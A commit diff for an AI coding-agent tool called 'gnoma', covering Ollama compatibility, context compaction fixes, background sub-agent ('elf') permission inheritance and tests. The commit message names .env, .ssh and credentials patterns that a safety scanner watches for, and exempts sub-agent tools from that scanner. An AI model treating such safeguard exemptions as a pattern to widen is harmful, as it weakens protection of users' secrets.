feat: Ollama/gemma4 compat — /init flow, stream filter, safety fixes

provider/openai:
- Fix doubled tool call args (argsComplete flag): Ollama sends complete
  args in the first streaming chunk then repeats them as delta, causing
  doubled JSON and 400 errors in elfs
- Handle fs: prefix (gemma4 uses fs:grep instead of fs.grep)
- Add Reasoning field support for Ollama thinking output

cmd/gnoma:
- Early TTY detection so logger is created with correct destination
  before any component gets a reference to it (fixes slog WARN bleed
  into TUI textarea)

permission:
- Exempt spawn_elfs and agent tools from safety scanner: elf prompt
  text may legitimately mention .env/.ssh/credentials patterns and
  should not be blocked

tui/app:
- /init retry chain: no-tool-calls → spawn_elfs nudge → write nudge
  (ask for plain text output) → TUI fallback write from streamBuf
- looksLikeAgentsMD + extractMarkdownDoc: validate and clean fallback
  content before writing (reject refusals, strip narrative preambles)
- Collapse thinking output to 3 lines; ctrl+o to expand (live stream
  and committed messages)
- Stream-level filter for model pseudo-tool-call blocks: suppresses
  <<tool_code>>...</tool_code>> and <<function_call>>...<tool_call|>
  from entering streamBuf across chunk boundaries
- sanitizeAssistantText regex covers both block formats
- Reset streamFilterClose at every turn start
This commit is contained in:
2026-04-05 19:24:51 +02:00
parent 14b88cadcc
commit cb2d63d06f
51 changed files with 2855 additions and 353 deletions

View File

@@ -48,14 +48,14 @@ type ProviderSection struct {
Default string `toml:"default"`
Model string `toml:"model"`
MaxTokens int64 `toml:"max_tokens"`
Temperature *float64 `toml:"temperature"`
Temperature *float64 `toml:"temperature"` // TODO(M8): wire to provider.Request.Temperature
APIKeys map[string]string `toml:"api_keys"`
Endpoints map[string]string `toml:"endpoints"`
}
type ToolsSection struct {
BashTimeout Duration `toml:"bash_timeout"`
MaxFileSize int64 `toml:"max_file_size"`
MaxFileSize int64 `toml:"max_file_size"` // TODO(M8): wire to fs tool WithMaxFileSize option
}
// RateLimitSection allows overriding default rate limits per provider.

View File

@@ -119,6 +119,67 @@ func TestApplyEnv_EnvVarReference(t *testing.T) {
}
}
// TestProjectRoot_GoMod verifies ProjectRoot finds the directory containing
// go.mod when invoked from a nested subdirectory.
func TestProjectRoot_GoMod(t *testing.T) {
	// Resolve symlinks up front: on some platforms (macOS /tmp -> /private/tmp)
	// t.TempDir returns a symlinked path while os.Getwd reports the resolved
	// one, which would make the equality check below flake.
	root, err := filepath.EvalSymlinks(t.TempDir())
	if err != nil {
		t.Fatalf("EvalSymlinks: %v", err)
	}
	sub := filepath.Join(root, "pkg", "util")
	if err := os.MkdirAll(sub, 0o755); err != nil {
		t.Fatalf("MkdirAll: %v", err)
	}
	if err := os.WriteFile(filepath.Join(root, "go.mod"), []byte("module example.com/foo\n"), 0o644); err != nil {
		t.Fatalf("WriteFile: %v", err)
	}
	origDir, err := os.Getwd()
	if err != nil {
		t.Fatalf("Getwd: %v", err)
	}
	if err := os.Chdir(sub); err != nil {
		t.Fatalf("Chdir: %v", err)
	}
	defer os.Chdir(origDir)
	got := ProjectRoot()
	if got != root {
		t.Errorf("ProjectRoot() = %q, want %q", got, root)
	}
}
// TestProjectRoot_Git verifies ProjectRoot stops at a directory containing
// a .git directory.
func TestProjectRoot_Git(t *testing.T) {
	// Resolve symlinks so the comparison survives symlinked temp dirs
	// (e.g. /tmp -> /private/tmp on macOS) where Getwd returns the real path.
	root, err := filepath.EvalSymlinks(t.TempDir())
	if err != nil {
		t.Fatalf("EvalSymlinks: %v", err)
	}
	sub := filepath.Join(root, "src")
	if err := os.MkdirAll(sub, 0o755); err != nil {
		t.Fatalf("MkdirAll: %v", err)
	}
	if err := os.MkdirAll(filepath.Join(root, ".git"), 0o755); err != nil {
		t.Fatalf("MkdirAll .git: %v", err)
	}
	origDir, err := os.Getwd()
	if err != nil {
		t.Fatalf("Getwd: %v", err)
	}
	if err := os.Chdir(sub); err != nil {
		t.Fatalf("Chdir: %v", err)
	}
	defer os.Chdir(origDir)
	got := ProjectRoot()
	if got != root {
		t.Errorf("ProjectRoot() = %q, want %q", got, root)
	}
}
// TestProjectRoot_GnomaDir verifies ProjectRoot stops at a directory
// containing a .gnoma directory.
func TestProjectRoot_GnomaDir(t *testing.T) {
	// Resolve symlinks so the comparison survives symlinked temp dirs
	// (e.g. /tmp -> /private/tmp on macOS) where Getwd returns the real path.
	root, err := filepath.EvalSymlinks(t.TempDir())
	if err != nil {
		t.Fatalf("EvalSymlinks: %v", err)
	}
	sub := filepath.Join(root, "internal")
	if err := os.MkdirAll(sub, 0o755); err != nil {
		t.Fatalf("MkdirAll: %v", err)
	}
	if err := os.MkdirAll(filepath.Join(root, ".gnoma"), 0o755); err != nil {
		t.Fatalf("MkdirAll .gnoma: %v", err)
	}
	origDir, err := os.Getwd()
	if err != nil {
		t.Fatalf("Getwd: %v", err)
	}
	if err := os.Chdir(sub); err != nil {
		t.Fatalf("Chdir: %v", err)
	}
	defer os.Chdir(origDir)
	got := ProjectRoot()
	if got != root {
		t.Errorf("ProjectRoot() = %q, want %q", got, root)
	}
}
// TestProjectRoot_Fallback verifies ProjectRoot returns the current working
// directory when no marker (go.mod, .git, .gnoma) exists anywhere above it.
func TestProjectRoot_Fallback(t *testing.T) {
	// Resolve symlinks so the comparison against Getwd-derived output is stable.
	dir, err := filepath.EvalSymlinks(t.TempDir())
	if err != nil {
		t.Fatalf("EvalSymlinks: %v", err)
	}
	origDir, err := os.Getwd()
	if err != nil {
		t.Fatalf("Getwd: %v", err)
	}
	if err := os.Chdir(dir); err != nil {
		t.Fatalf("Chdir: %v", err)
	}
	defer os.Chdir(origDir)
	got := ProjectRoot()
	if got != dir {
		t.Errorf("ProjectRoot() = %q, want %q (cwd fallback)", got, dir)
	}
}
func TestLayeredLoad(t *testing.T) {
// Set up global config
globalDir := t.TempDir()

View File

@@ -55,8 +55,31 @@ func globalConfigPath() string {
return filepath.Join(configDir, "gnoma", "config.toml")
}
// ProjectRoot walks up from cwd to find the nearest directory containing
// a go.mod, .git, or .gnoma directory. Falls back to cwd if none found.
func ProjectRoot() string {
cwd, err := os.Getwd()
if err != nil {
return "."
}
dir := cwd
for {
for _, marker := range []string{"go.mod", ".git", ".gnoma"} {
if _, err := os.Stat(filepath.Join(dir, marker)); err == nil {
return dir
}
}
parent := filepath.Dir(dir)
if parent == dir {
break
}
dir = parent
}
return cwd
}
func projectConfigPath() string {
return filepath.Join(".gnoma", "config.toml")
return filepath.Join(ProjectRoot(), ".gnoma", "config.toml")
}
func applyEnv(cfg *Config) {

View File

@@ -9,6 +9,7 @@ import (
"github.com/BurntSushi/toml"
)
// SetProjectConfig writes a single key=value to the project config file (.gnoma/config.toml).
// Only whitelisted keys are supported.
func SetProjectConfig(key, value string) error {
@@ -21,7 +22,7 @@ func SetProjectConfig(key, value string) error {
return fmt.Errorf("unknown config key %q (supported: %s)", key, strings.Join(allowedKeys(), ", "))
}
path := filepath.Join(".gnoma", "config.toml")
path := projectConfigPath()
// Load existing config or start fresh
var cfg Config

View File

@@ -0,0 +1,34 @@
package context
import "somegit.dev/Owlibou/gnoma/internal/message"
// safeSplitPoint adjusts a compaction split index to avoid orphaning tool
// results. If history[target] is a tool-result message, it walks backward
// until it finds a message that is not a tool result, so the assistant message
// that issued the tool calls stays in the "recent" window alongside its results.
//
// target is the index of the first message to keep in the recent window.
// Returns an adjusted index guaranteed to keep tool-call/tool-result pairs together.
func safeSplitPoint(history []message.Message, target int) int {
	n := len(history)
	if target <= 0 || n == 0 {
		return 0
	}
	// Clamp an out-of-range target onto the last message.
	if target >= n {
		target = n - 1
	}
	// Walk left past any tool-result messages (floored at index 0).
	split := target
	for split > 0 && hasToolResults(history[split]) {
		split--
	}
	return split
}
// hasToolResults reports whether msg contains any ContentToolResult blocks.
func hasToolResults(msg message.Message) bool {
	for i := range msg.Content {
		if msg.Content[i].Type == message.ContentToolResult {
			return true
		}
	}
	return false
}

View File

@@ -197,3 +197,215 @@ func (s *failingStrategy) Compact(msgs []message.Message, budget int64) ([]messa
}
var _ Strategy = (*failingStrategy)(nil)
// AppendMessage must store the message but leave the token tracker untouched.
func TestWindow_AppendMessage_NoTokenTracking(t *testing.T) {
	win := NewWindow(WindowConfig{MaxTokens: 100_000})
	usedBefore := win.Tracker().Used()
	win.AppendMessage(message.NewUserText("hello"))
	usedAfter := win.Tracker().Used()
	if usedAfter != usedBefore {
		t.Errorf("AppendMessage should not change tracker: before=%d, after=%d", usedBefore, usedAfter)
	}
	if got := len(win.Messages()); got != 1 {
		t.Errorf("expected 1 message, got %d", got)
	}
}
// After compaction, the tracker should reflect a content-based token estimate
// of the surviving messages, not a message-count ratio of the old total.
func TestWindow_CompactionUsesEstimateNotRatio(t *testing.T) {
	win := NewWindow(WindowConfig{
		MaxTokens: 200_000,
		Strategy:  &TruncateStrategy{KeepRecent: 2},
	})
	// Seed 20 small messages (10 user/assistant pairs, 4000 tokens of usage
	// each). Compaction with KeepRecent=2 should leave 2 messages.
	for i := 0; i < 10; i++ {
		win.Append(message.NewUserText("msg"), message.Usage{InputTokens: 4000})
		win.Append(message.NewAssistantText("reply"), message.Usage{OutputTokens: 4000})
	}
	// Force the tracker past the critical threshold to trigger compaction.
	win.Tracker().Set(200_000 - DefaultAutocompactBuffer)
	compacted, err := win.CompactIfNeeded()
	if err != nil {
		t.Fatalf("CompactIfNeeded: %v", err)
	}
	if !compacted {
		t.Skip("compaction did not trigger")
	}
	// EstimateMessages over 2 short messages is tiny (<100 tokens), whereas
	// the old ratio-based update would land around ~17.8K. Anything under 17K
	// therefore indicates the estimate-based path.
	if used := win.Tracker().Used(); used >= 17_000 {
		t.Errorf("token tracker after compaction seems to use ratio (got %d tokens, expected <17000 for estimate-based)", used)
	}
}
// AddPrefix must append after the initial prefix and before the conversation.
func TestWindow_AddPrefix_AppendsToPrefix(t *testing.T) {
	win := NewWindow(WindowConfig{
		MaxTokens:      100_000,
		PrefixMessages: []message.Message{message.NewSystemText("initial prefix")},
	})
	win.AppendMessage(message.NewUserText("hello"))
	win.AddPrefix(
		message.NewUserText("[Project docs: AGENTS.md]\n\nBuild: make build"),
		message.NewAssistantText("Understood."),
	)
	// Expected layout: 1 initial prefix + 2 added prefix + 1 conversation msg.
	msgs := win.AllMessages()
	if len(msgs) != 4 {
		t.Errorf("AllMessages() = %d, want 4", len(msgs))
	}
	if msgs[1].Role != "user" {
		t.Errorf("all[1].Role = %q, want user", msgs[1].Role)
	}
	if msgs[3].Role != "user" {
		t.Errorf("all[3].Role = %q, want user (conversation msg)", msgs[3].Role)
	}
}
// Prefix messages added via AddPrefix must survive a Reset of the window.
func TestWindow_AddPrefix_SurvivesReset(t *testing.T) {
	win := NewWindow(WindowConfig{MaxTokens: 100_000})
	win.AppendMessage(message.NewUserText("hello"))
	win.AddPrefix(message.NewSystemText("added prefix"))
	win.Reset()
	// Reset drops conversation messages but keeps the hot-loaded prefix.
	if got := len(win.AllMessages()); got != 1 {
		t.Errorf("AllMessages() after Reset = %d, want 1 (just added prefix)", got)
	}
}
// Reset must clear conversation messages and tracker usage, keeping the prefix.
func TestWindow_Reset_ClearsMessages(t *testing.T) {
	win := NewWindow(WindowConfig{
		MaxTokens:      100_000,
		PrefixMessages: []message.Message{message.NewSystemText("prefix")},
	})
	win.AppendMessage(message.NewUserText("hello"))
	win.Tracker().Set(5000)
	win.Reset()
	if n := len(win.Messages()); n != 0 {
		t.Errorf("Messages after reset = %d, want 0", n)
	}
	if used := win.Tracker().Used(); used != 0 {
		t.Errorf("Tracker after reset = %d, want 0", used)
	}
	// The configured prefix must still be present.
	if n := len(win.AllMessages()); n != 1 {
		t.Errorf("AllMessages after reset should have prefix only, got %d", n)
	}
}
// --- Compaction safety (safeSplitPoint) ---
// toolCallMsg builds an assistant message carrying a single bash tool call
// with a fixed ID, for pairing against toolResultMsg in split-point tests.
func toolCallMsg() message.Message {
	call := message.ToolCall{
		ID:   "call-123",
		Name: "bash",
	}
	return message.NewAssistantContent(message.NewToolCallContent(call))
}
// toolResultMsg builds the tool-result message matching toolCallMsg's call ID.
func toolResultMsg() message.Message {
	res := message.ToolResult{
		ToolCallID: "call-123",
		Content:    "result",
	}
	return message.NewToolResults(res)
}
// A split landing on plain user text needs no adjustment.
func TestSafeSplitPoint_NoAdjustmentNeeded(t *testing.T) {
	history := []message.Message{
		message.NewUserText("hello"),        // 0
		message.NewAssistantText("hi"),      // 1
		message.NewUserText("do something"), // 2 — not a tool result, safe
	}
	// Keep history[2:] as the recent window; index 2 is already safe.
	if got := safeSplitPoint(history, 2); got != 2 {
		t.Errorf("safeSplitPoint = %d, want 2 (no adjustment needed)", got)
	}
}
// A split landing on a tool result must walk back to the tool-call message.
func TestSafeSplitPoint_WalksBackPastToolResult(t *testing.T) {
	history := []message.Message{
		message.NewUserText("hello"),     // 0
		message.NewAssistantText("hi"),   // 1
		toolCallMsg(),                    // 2 — assistant issuing the call
		toolResultMsg(),                  // 3 — must not become the split point
		message.NewAssistantText("done"), // 4
	}
	// Splitting at 3 would strand the tool result without its matching call;
	// expect the walk-back to land on the tool-call message at index 2.
	if got := safeSplitPoint(history, 3); got != 2 {
		t.Errorf("safeSplitPoint = %d, want 2 (walk back past tool result to tool call)", got)
	}
}
// TestSafeSplitPoint_NeverGoesNegative ensures the backward walk floors at
// index 0 instead of underflowing when every message is a tool result.
func TestSafeSplitPoint_NeverGoesNegative(t *testing.T) {
	// All messages are tool results — the walk from any target must stop at 0.
	history := []message.Message{
		toolResultMsg(),
		toolResultMsg(),
	}
	// target=1 actually exercises the walk-back loop; the original target=0
	// input returned early via the `target <= 0` guard without walking at all.
	got := safeSplitPoint(history, 1)
	if got != 0 {
		t.Errorf("safeSplitPoint = %d, want 0 (floor at 0)", got)
	}
	// target=0 still short-circuits to 0 via the guard.
	if got := safeSplitPoint(history, 0); got != 0 {
		t.Errorf("safeSplitPoint = %d, want 0 (floor at 0)", got)
	}
}
// Truncation must never keep a tool result whose tool call was dropped.
func TestTruncate_NeverOrphansToolResult(t *testing.T) {
	strat := NewTruncateStrategy() // keepRecent = 10 by default
	strat.KeepRecent = 3
	// With keepRecent=3, a naive split at index 2 would keep
	// [toolresult, assistant, user] and orphan the tool call at index 1;
	// safeSplitPoint must move the split back to index 1 instead.
	history := []message.Message{
		message.NewUserText("start"),     // 0
		toolCallMsg(),                    // 1 — assistant with tool call
		toolResultMsg(),                  // 2 — must stay paired with index 1
		message.NewAssistantText("done"), // 3
		message.NewUserText("next"),      // 4
	}
	result, err := strat.Compact(history, 100_000)
	if err != nil {
		t.Fatalf("Compact error: %v", err)
	}
	// Collect every tool-call ID that survived compaction...
	seenCalls := make(map[string]bool)
	for _, m := range result {
		for _, c := range m.Content {
			if c.Type == message.ContentToolCall && c.ToolCall != nil {
				seenCalls[c.ToolCall.ID] = true
			}
		}
	}
	// ...then require each surviving tool result to reference one of them.
	for _, m := range result {
		for _, c := range m.Content {
			if c.Type != message.ContentToolResult || c.ToolResult == nil {
				continue
			}
			if !seenCalls[c.ToolResult.ToolCallID] {
				t.Errorf("orphaned tool result: ToolCallID %q has no matching tool call in compacted history",
					c.ToolResult.ToolCallID)
			}
		}
	}
}

View File

@@ -56,13 +56,16 @@ func (s *SummarizeStrategy) Compact(messages []message.Message, budget int64) ([
return messages, nil
}
// Split: old messages to summarize, recent to keep
// Split: old messages to summarize, recent to keep.
// Adjust split to never orphan tool results — the assistant message with
// matching tool calls must stay in the recent window with its results.
keepRecent := 6
if keepRecent > len(history) {
keepRecent = len(history)
}
oldMessages := history[:len(history)-keepRecent]
recentMessages := history[len(history)-keepRecent:]
splitAt := safeSplitPoint(history, len(history)-keepRecent)
oldMessages := history[:splitAt]
recentMessages := history[splitAt:]
// Build conversation text for summarization
var convText strings.Builder

View File

@@ -46,7 +46,10 @@ func (s *TruncateStrategy) Compact(messages []message.Message, budget int64) ([]
marker := message.NewUserText("[Earlier conversation was summarized to save context]")
ack := message.NewAssistantText("Understood, I'll continue from here.")
recent := history[len(history)-keepRecent:]
// Adjust split to never orphan tool results (the assistant message with
// matching tool calls must stay in the recent window with its results).
splitAt := safeSplitPoint(history, len(history)-keepRecent)
recent := history[splitAt:]
result := append(systemMsgs, marker, ack)
result = append(result, recent...)
return result, nil

View File

@@ -57,12 +57,20 @@ func NewWindow(cfg WindowConfig) *Window {
}
}
// Append adds a message and tracks usage.
// Append adds a message and tracks usage (legacy: accumulates InputTokens+OutputTokens).
// Prefer AppendMessage + Tracker().Set() for accurate per-round tracking.
func (w *Window) Append(msg message.Message, usage message.Usage) {
w.messages = append(w.messages, msg)
w.tracker.Add(usage)
}
// AppendMessage adds a message without touching the token tracker.
// Use this for user messages, tool results, and injected context — callers
// are responsible for updating the tracker separately (e.g., via Tracker().Set),
// typically from provider-reported usage after the next round.
func (w *Window) AppendMessage(msg message.Message) {
	w.messages = append(w.messages, msg)
}
// Messages returns the mutable conversation history (without prefix).
func (w *Window) Messages() []message.Message {
return w.messages
@@ -162,8 +170,9 @@ func (w *Window) doCompact(force bool) (bool, error) {
originalLen := len(w.messages)
w.messages = compacted
ratio := float64(len(compacted)) / float64(originalLen+1)
w.tracker.Set(int64(float64(w.tracker.Used()) * ratio))
// Re-estimate tokens from actual message content rather than using a
// message-count ratio (which is unrelated to token count).
w.tracker.Set(EstimateMessages(compacted))
w.logger.Info("compaction complete",
"messages_before", originalLen,
@@ -179,6 +188,12 @@ func (w *Window) doCompact(force bool) (bool, error) {
return true, nil
}
// AddPrefix appends messages to the immutable prefix.
// Used to hot-load project docs (e.g., after /init generates AGENTS.md).
// Prefix messages appear before the conversation in AllMessages and are
// preserved across Reset.
func (w *Window) AddPrefix(msgs ...message.Message) {
	w.prefix = append(w.prefix, msgs...)
}
// Reset clears all messages and usage (prefix is preserved).
func (w *Window) Reset() {
w.messages = nil

View File

@@ -3,6 +3,7 @@ package elf
import (
"context"
"fmt"
"sync"
"sync/atomic"
"time"
@@ -73,13 +74,16 @@ func nextID(prefix string) string {
// BackgroundElf runs on its own goroutine with an independent engine.
type BackgroundElf struct {
id string
eng *engine.Engine
events chan stream.Event
result chan Result
cancel context.CancelFunc
status atomic.Int32
startAt time.Time
id string
eng *engine.Engine
events chan stream.Event
result chan Result
cancel context.CancelFunc
status atomic.Int32
startAt time.Time
cachedResult Result
resultOnce sync.Once
eventsClose sync.Once
}
// SpawnBackground creates and starts a background elf.
@@ -102,6 +106,22 @@ func SpawnBackground(eng *engine.Engine, prompt string) *BackgroundElf {
}
func (e *BackgroundElf) run(ctx context.Context, prompt string) {
closeEvents := func() { e.eventsClose.Do(func() { close(e.events) }) }
defer func() {
if r := recover(); r != nil {
closeEvents()
res := Result{
ID: e.id,
Status: StatusFailed,
Error: fmt.Errorf("elf panicked: %v", r),
Duration: time.Since(e.startAt),
}
e.status.Store(int32(StatusFailed))
e.result <- res
}
}()
cb := func(evt stream.Event) {
select {
case e.events <- evt:
@@ -111,7 +131,7 @@ func (e *BackgroundElf) run(ctx context.Context, prompt string) {
turn, err := e.eng.Submit(ctx, prompt, cb)
close(e.events)
closeEvents()
r := Result{
ID: e.id,
@@ -149,5 +169,8 @@ func (e *BackgroundElf) Events() <-chan stream.Event { return e.events }
func (e *BackgroundElf) Cancel() { e.cancel() }
func (e *BackgroundElf) Wait() Result {
return <-e.result
e.resultOnce.Do(func() {
e.cachedResult = <-e.result
})
return e.cachedResult
}

View File

@@ -222,6 +222,94 @@ func TestManager_WaitAll(t *testing.T) {
}
}
// Wait must be callable more than once: the second call returns the cached
// result instead of blocking on the (already drained) result channel.
func TestBackgroundElf_WaitIdempotent(t *testing.T) {
	mp := &mockProvider{
		name:    "test",
		streams: []stream.Stream{newEventStream("hello")},
	}
	eng, _ := engine.New(engine.Config{Provider: mp, Tools: tool.NewRegistry()})
	bg := SpawnBackground(eng, "do something")
	first := bg.Wait()
	second := bg.Wait() // must not deadlock
	if first.Status != second.Status {
		t.Errorf("Wait() returned different statuses: %s vs %s", first.Status, second.Status)
	}
	if first.Output != second.Output {
		t.Errorf("Wait() returned different outputs: %q vs %q", first.Output, second.Output)
	}
}
func TestBackgroundElf_PanicRecovery(t *testing.T) {
// A provider that panics on Stream() — simulates an engine crash
panicProvider := &panicOnStreamProvider{}
eng, _ := engine.New(engine.Config{Provider: panicProvider, Tools: tool.NewRegistry()})
elf := SpawnBackground(eng, "do something")
result := elf.Wait() // must not hang
if result.Status != StatusFailed {
t.Errorf("status = %s, want failed", result.Status)
}
if result.Error == nil {
t.Error("error should be non-nil after panic recovery")
}
}
// panicOnStreamProvider is a provider stub whose Stream always panics,
// used to exercise BackgroundElf's panic-recovery path.
type panicOnStreamProvider struct{}

func (p *panicOnStreamProvider) Name() string { return "panic" }
func (p *panicOnStreamProvider) DefaultModel() string { return "panic" }

// Models returns no models; the stub never reaches a real API.
func (p *panicOnStreamProvider) Models(_ context.Context) ([]provider.ModelInfo, error) {
	return nil, nil
}

// Stream panics unconditionally to simulate a crash inside the engine round-trip.
func (p *panicOnStreamProvider) Stream(_ context.Context, _ provider.Request) (stream.Stream, error) {
	panic("intentional test panic")
}
// Cleanup must remove both the elf entry and its routing metadata entry;
// the meta map previously leaked finished elfs.
func TestManager_CleanupRemovesMeta(t *testing.T) {
	mp := &mockProvider{
		name:    "test",
		streams: []stream.Stream{newEventStream("result")},
	}
	rtr := router.New(router.Config{})
	rtr.RegisterArm(&router.Arm{
		ID: "test/mock", Provider: mp, ModelName: "mock",
		Capabilities: provider.Capabilities{ToolUse: true},
	})
	mgr := NewManager(ManagerConfig{Router: rtr, Tools: tool.NewRegistry()})
	e, _ := mgr.Spawn(context.Background(), router.TaskGeneration, "task", "", 30)
	e.Wait()
	// Sanity check: both maps track the elf before cleanup.
	mgr.mu.RLock()
	_, haveElf := mgr.elfs[e.ID()]
	_, haveMeta := mgr.meta[e.ID()]
	mgr.mu.RUnlock()
	if !haveElf || !haveMeta {
		t.Fatal("elf and meta should exist before cleanup")
	}
	mgr.Cleanup()
	// After cleanup, both entries must be gone.
	mgr.mu.RLock()
	_, haveElf = mgr.elfs[e.ID()]
	_, haveMeta = mgr.meta[e.ID()]
	mgr.mu.RUnlock()
	if haveElf {
		t.Error("elf should be removed after cleanup")
	}
	if haveMeta {
		t.Error("meta should be removed after cleanup (was leaking)")
	}
}
// slowEventStream blocks until context cancelled
type slowEventStream struct {
done bool

View File

@@ -7,31 +7,38 @@ import (
"sync"
"somegit.dev/Owlibou/gnoma/internal/engine"
"somegit.dev/Owlibou/gnoma/internal/permission"
"somegit.dev/Owlibou/gnoma/internal/provider"
"somegit.dev/Owlibou/gnoma/internal/router"
"somegit.dev/Owlibou/gnoma/internal/security"
"somegit.dev/Owlibou/gnoma/internal/tool"
)
// elfMeta tracks routing metadata for quality feedback.
// elfMeta tracks routing metadata and pool reservations for quality feedback.
type elfMeta struct {
armID router.ArmID
taskType router.TaskType
decision router.RoutingDecision // holds pool reservations until elf completes
}
// Manager spawns, tracks, and manages elfs.
type Manager struct {
mu sync.RWMutex
elfs map[string]Elf
meta map[string]elfMeta // routing metadata per elf ID
router *router.Router
tools *tool.Registry
logger *slog.Logger
mu sync.RWMutex
elfs map[string]Elf
meta map[string]elfMeta // routing metadata per elf ID
router *router.Router
tools *tool.Registry
permissions *permission.Checker
firewall *security.Firewall
logger *slog.Logger
}
type ManagerConfig struct {
Router *router.Router
Tools *tool.Registry
Logger *slog.Logger
Router *router.Router
Tools *tool.Registry
Permissions *permission.Checker // nil = allow all (unsafe; prefer passing parent checker)
Firewall *security.Firewall // nil = no scanning
Logger *slog.Logger
}
func NewManager(cfg ManagerConfig) *Manager {
@@ -40,11 +47,13 @@ func NewManager(cfg ManagerConfig) *Manager {
logger = slog.Default()
}
return &Manager{
elfs: make(map[string]Elf),
meta: make(map[string]elfMeta),
router: cfg.Router,
tools: cfg.Tools,
logger: logger,
elfs: make(map[string]Elf),
meta: make(map[string]elfMeta),
router: cfg.Router,
tools: cfg.Tools,
permissions: cfg.Permissions,
firewall: cfg.Firewall,
logger: logger,
}
}
@@ -71,16 +80,26 @@ func (m *Manager) Spawn(ctx context.Context, taskType router.TaskType, prompt, s
"model", arm.ModelName,
)
// Resolve permissions for this elf: inherit parent mode but never prompt
// (no TUI in elf context — prompting would deadlock).
elfPerms := m.permissions
if elfPerms != nil {
elfPerms = elfPerms.WithDenyPrompt()
}
// Create independent engine for the elf
eng, err := engine.New(engine.Config{
Provider: arm.Provider,
Tools: m.tools,
System: systemPrompt,
Model: arm.ModelName,
MaxTurns: maxTurns,
Logger: m.logger,
Provider: arm.Provider,
Tools: m.tools,
Permissions: elfPerms,
Firewall: m.firewall,
System: systemPrompt,
Model: arm.ModelName,
MaxTurns: maxTurns,
Logger: m.logger,
})
if err != nil {
decision.Rollback()
return nil, fmt.Errorf("create elf engine: %w", err)
}
@@ -88,14 +107,14 @@ func (m *Manager) Spawn(ctx context.Context, taskType router.TaskType, prompt, s
m.mu.Lock()
m.elfs[elf.ID()] = elf
m.meta[elf.ID()] = elfMeta{armID: arm.ID, taskType: taskType}
m.meta[elf.ID()] = elfMeta{armID: arm.ID, taskType: taskType, decision: decision}
m.mu.Unlock()
m.logger.Info("elf spawned", "id", elf.ID(), "arm", arm.ID)
return elf, nil
}
// ReportResult reports an elf's outcome to the router for quality feedback.
// ReportResult commits pool reservations and reports an elf's outcome to the router.
func (m *Manager) ReportResult(result Result) {
m.mu.RLock()
meta, ok := m.meta[result.ID]
@@ -105,6 +124,11 @@ func (m *Manager) ReportResult(result Result) {
return
}
// Commit pool reservations with actual token consumption.
// Cancelled/failed elfs still commit what they consumed; a zero commit is
// safe — it just moves reserved tokens to used at rate 0.
meta.decision.Commit(int(result.Usage.TotalTokens()))
m.router.ReportOutcome(router.Outcome{
ArmID: meta.armID,
TaskType: meta.taskType,
@@ -116,13 +140,19 @@ func (m *Manager) ReportResult(result Result) {
// SpawnWithProvider creates an elf using a specific provider (bypasses router).
func (m *Manager) SpawnWithProvider(prov provider.Provider, model, prompt, systemPrompt string, maxTurns int) (Elf, error) {
elfPerms := m.permissions
if elfPerms != nil {
elfPerms = elfPerms.WithDenyPrompt()
}
eng, err := engine.New(engine.Config{
Provider: prov,
Tools: m.tools,
System: systemPrompt,
Model: model,
MaxTurns: maxTurns,
Logger: m.logger,
Provider: prov,
Tools: m.tools,
Permissions: elfPerms,
Firewall: m.firewall,
System: systemPrompt,
Model: model,
MaxTurns: maxTurns,
Logger: m.logger,
})
if err != nil {
return nil, fmt.Errorf("create elf engine: %w", err)
@@ -207,6 +237,7 @@ func (m *Manager) Cleanup() {
s := e.Status()
if s == StatusCompleted || s == StatusFailed || s == StatusCancelled {
delete(m.elfs, id)
delete(m.meta, id)
}
}
}

View File

@@ -45,6 +45,11 @@ type Turn struct {
Rounds int // number of API round-trips
}
// TurnOptions carries per-turn overrides that apply for a single Submit call.
type TurnOptions struct {
ToolChoice provider.ToolChoiceMode // "" = use provider default
}
// Engine orchestrates the conversation.
type Engine struct {
cfg Config
@@ -59,6 +64,9 @@ type Engine struct {
// Deferred tool loading: tools with ShouldDefer() are excluded until
// the model requests them. Activated on first use.
activatedTools map[string]bool
// Per-turn options, set for the duration of SubmitWithOptions.
turnOpts TurnOptions
}
// New creates an engine.
@@ -124,6 +132,9 @@ func (e *Engine) ContextWindow() *gnomactx.Window {
// the model should see as context in subsequent turns.
func (e *Engine) InjectMessage(msg message.Message) {
	e.history = append(e.history, msg)
	// Mirror the injected message into the context window (when configured)
	// so compaction and token accounting see the same history.
	if win := e.cfg.Context; win != nil {
		win.AppendMessage(msg)
	}
}
// Usage returns cumulative token usage.
@@ -145,4 +156,8 @@ func (e *Engine) SetModel(model string) {
func (e *Engine) Reset() {
	// Drop conversation state and usage; deferred tools revert to inactive.
	e.history = nil
	e.usage = message.Usage{}
	e.activatedTools = make(map[string]bool)
	// Keep the context window in sync (its prefix survives its own Reset).
	if win := e.cfg.Context; win != nil {
		win.Reset()
	}
}

View File

@@ -7,6 +7,7 @@ import (
"fmt"
"testing"
gnomactx "somegit.dev/Owlibou/gnoma/internal/context"
"somegit.dev/Owlibou/gnoma/internal/message"
"somegit.dev/Owlibou/gnoma/internal/provider"
"somegit.dev/Owlibou/gnoma/internal/stream"
@@ -446,6 +447,109 @@ func TestEngine_Reset(t *testing.T) {
}
}
// Engine.Reset must also clear the attached context window's messages.
func TestEngine_Reset_ClearsContextWindow(t *testing.T) {
	win := gnomactx.NewWindow(gnomactx.WindowConfig{MaxTokens: 200_000})
	mp := &mockProvider{
		name: "test",
		streams: []stream.Stream{
			newEventStream(message.StopEndTurn, "",
				stream.Event{Type: stream.EventTextDelta, Text: "hi"},
			),
		},
	}
	eng, _ := New(Config{
		Provider: mp,
		Tools:    tool.NewRegistry(),
		Context:  win,
	})
	eng.Submit(context.Background(), "hello", nil)
	if len(win.Messages()) == 0 {
		t.Fatal("context window should have messages before reset")
	}
	eng.Reset()
	if n := len(win.Messages()); n != 0 {
		t.Errorf("context window should be empty after reset, got %d messages", n)
	}
}
// A tool-using turn must land every message (user, tool-call assistant,
// tool results, final assistant) in the attached context window.
func TestSubmit_ContextWindowTracksUserAndToolMessages(t *testing.T) {
	reg := tool.NewRegistry()
	reg.Register(&mockTool{
		name: "bash",
		execFn: func(_ context.Context, _ json.RawMessage) (tool.Result, error) {
			return tool.Result{Output: "output"}, nil
		},
	})
	// Round 1 requests a bash call; round 2 ends the turn with text.
	mp := &mockProvider{
		name: "test",
		streams: []stream.Stream{
			newEventStream(message.StopToolUse, "model",
				stream.Event{Type: stream.EventToolCallStart, ToolCallID: "tc1", ToolCallName: "bash"},
				stream.Event{Type: stream.EventToolCallDone, ToolCallID: "tc1", Args: json.RawMessage(`{"command":"ls"}`)},
				stream.Event{Type: stream.EventUsage, Usage: &message.Usage{InputTokens: 100, OutputTokens: 20}},
			),
